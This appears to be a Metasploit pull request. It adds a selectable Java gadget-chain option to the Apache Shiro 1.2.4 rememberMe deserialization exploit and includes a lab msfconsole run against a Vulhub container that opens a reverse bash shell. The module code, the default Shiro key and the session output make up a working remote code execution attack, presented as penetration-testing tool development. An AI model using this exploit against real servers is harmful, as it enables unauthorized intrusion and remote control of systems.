### PR TITLE
Add configurable JAVA_GADGET_CHAIN option to Shiro module

### DIFF
--- a/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md
+++ b/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md
@@ -7,8 +7,10 @@ unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
 server as the value to the `rememberMe` cookie. This will result in code
 execution in the context of the web server.
 
-The YSoSerial `CommonsCollections2` payload is known to work and is the one
-leveraged by this module.
+The YSoSerial `CommonsCollections2` payload is known to work and is the
+default gadget chain used by this module. The gadget chain is configurable
+via the `JAVA_GADGET_CHAIN` option; the selected chain must be available on
+the target's classpath.
 
 Note that other versions of Apache Shiro may also be exploitable if the
 encryption key used by Shiro to encrypt `rememberMe` cookies is known.
@@ -29,8 +31,12 @@ You can use <https://github.com/Medicean/VulApps/tree/master/s/shiro/1>.
 3. `run`
 
 ## Options
+
 ### ENC_KEY
 The encryption key the target Apache Shiro server is using to encrypt its `rememberMe` cookies.
+
+### JAVA_GADGET_CHAIN
+The Java deserialization gadget chain to use. The chain must be available on the target's classpath.
 
 ## Scenarios
 
@@ -43,15 +49,16 @@ msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options
 
 Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):
 
-   Name       Current Setting           Required  Description
-   ----       ---------------           --------  -----------
-   ENC_KEY    kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
-   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      80                        yes       The target port (TCP)
-   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                         yes       Base directory path
-   VHOST                                no        HTTP server virtual host
+   Name               Current Setting           Required  Description
+   ----               ---------------           --------  -----------
+   ENC_KEY            kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
+   JAVA_GADGET_CHAIN  CommonsCollections2       yes       The Java gadget chain to use for deserialization
+   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT              80                        yes       The target port (TCP)
+   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                         yes       Base directory path
+   VHOST                                        no        HTTP server virtual host
 
 
 Payload options (cmd/unix/reverse_bash):

--- a/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
+++ b/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
@@ -20,6 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote
           installations of Apache Shiro v1.2.4. Note that other versions of Apache Shiro may
           also be exploitable if the encryption key used by Shiro to encrypt rememberMe
           cookies is known.
+
+          The gadget chain used for Java deserialization must be present on the target's classpath.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -62,7 +64,11 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [ true, 'Base directory path', '/']),
-        OptString.new('ENC_KEY', [ true, 'Shiro encryption key', 'kPH+bIxk5D2deZiIxcaaaA=='])
+        OptString.new('ENC_KEY', [ true, 'Shiro encryption key', 'kPH+bIxk5D2deZiIxcaaaA==']),
+        OptEnum.new('JAVA_GADGET_CHAIN', [
+          true, 'The Java gadget chain to use for deserialization', 'CommonsCollections2',
+          Msf::Exploit::JavaDeserialization.gadget_chains
+        ])
       ]
     )
   end
@@ -75,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    java_payload = generate_java_deserialization_for_payload('CommonsCollections2', payload)
+    java_payload = generate_java_deserialization_for_payload(datastore['JAVA_GADGET_CHAIN'], payload)
     ciphertext = aes_encrypt(java_payload)
     base64_ciphertext = Rex::Text.encode_base64(ciphertext)
 


### PR DESCRIPTION
The gadget chain was previously hardcoded to CommonsCollections2. This PR adds a `JAVA_GADGET_CHAIN` `OptEnum` option so operators can select the chain that matches the target's classpath without modifying the module (similarly to [exploits/multi/http/log4shell_header_injection.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/log4shell_header_injection.rb)). The default remains CommonsCollections2 to preserve existing behaviour.

**Motivation:** I ran the module against Vulhub's Shiro 1.2.4 Docker image (vulhub/shiro:1.2.4) and the hardcoded CommonsCollections2 failed, whereas manual exploits using CommonsCollections6 and CommonsBeanutils1 worked. (To the best of my knowledge, `shiro-core` declares `commons-beanutils` as a direct dependency, so CommonsBeanutils1 should be on the classpath of any application using Shiro 1.2.4.)

The module documentation has been updated to reflect the new option.

 ## Verification

- Start `msfconsole`
- `use exploit/multi/http/shiro_rememberme_v124_deserialize`
- `set RHOSTS <rhost>`
- `set LHOST <lhost>`
- Verify `show options` displays the `JAVA_GADGET_CHAIN` option with CommonsCollections2 as default
- Verify setting an invalid value (e.g. `set JAVA_GADGET_CHAIN NotAGadget`) is rejected
- `set JAVA_GADGET_CHAIN CommonsBeanutils1` and run
  -  verify a session opens
- `set JAVA_GADGET_CHAIN CommonsCollections6` and run
  -  verify a session opens

## Example

In the following example I ran the exploit in a lab setup using Vulhub's Shiro 1.2.4 Docker image at `172.18.0.2` and ran the exploit from a host at `172.18.0.1` using CommonsBeanutils1 as the gadget chain.

```bash
msf > use exploit/multi/http/shiro_rememberme_v124_deserialize 
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set RHOSTS 172.18.0.2
RHOSTS => 172.18.0.2
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set JAVA_GADGET_CHAIN CommonsBeanutils1
JAVA_GADGET_CHAIN => CommonsBeanutils1
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options

Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):

   Name               Current Setting           Required  Description
   ----               ---------------           --------  -----------
   ENC_KEY            kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
   JAVA_GADGET_CHAIN  CommonsBeanutils1         yes       The Java gadget chain to use for deserialization (Accepted: AspectJWeaver, BeanFa
                                                          ctory, BeanShell1, C3P0, Click1, Clojure, CommonsBeanutils1, CommonsCollections1,
                                                           CommonsCollections2, CommonsCollections3, CommonsCollections4, CommonsCollection
                                                          s5, CommonsCollections6, CommonsCollections7, FileUpload1, Groovy1, Hibernate1, H
                                                          ibernate2, JBossInterceptors1, JSON1, JavassistWeld1, Jdk7u21, Jython1, MozillaRh
                                                          ino1, MozillaRhino2, Myfaces1, Myfaces2, ROME, Spring1, Spring2, URLDNS, Vaadin1,
                                                           Wicket1, frohoff/ysoserial#168)
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies:
                                                          sapni, socks4, socks5, http, socks5h
   RHOSTS             172.18.0.2                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                                          using-metasploit.html
   RPORT              80                        yes       The target port (TCP)
   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI          /                         yes       Base directory path
   VHOST                                        no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command payload



View the full module info with the info, or info -d command.

msf exploit(multi/http/shiro_rememberme_v124_deserialize) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:52800) at 2026-05-05 15:46:08 +0000

^Z
Background session 1? [y/N]  y
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               172.18.0.1:4444 -> 172.18.0.2:52800 (172.18.0.2)
```